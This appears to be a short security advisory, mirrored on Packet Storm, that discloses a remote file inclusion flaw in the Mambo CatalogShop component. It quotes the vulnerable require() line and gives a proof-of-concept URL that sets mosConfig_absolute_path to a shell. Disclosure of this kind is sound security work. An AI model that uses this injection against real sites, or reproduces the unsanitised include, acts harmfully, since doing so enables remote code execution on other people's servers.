Mambo CatalogShop suffers from a remote file inclusion vulnerability.
3709b233ecc6f3ec546ed805bab7e0da388df7fe8e903fce2a4c9305a4b091e4 ###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
###########################################################################################
#Software: Mambo CatalogShop
#Attack method: Remote File Inclusion
#Descriptio : This is a modified version of the FacileForms mambot, which allows you to add and view user comments and ratings below content in the categories setup in xtdratings. Just publish it!
#Source:
# Variables - Don't change anything here!!!
require($mosConfig_absolute_path."/administrator/components/com_catalogshop/config.catalogshop.php");
************************************************************************************
#Proof of Concept:
#http://www.site.com/catalogshop.php?mosConfig_absolute_path=shell
#
#----------------------------------------------------------
#
#
#Contact : Outlaw@aria-security.net
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed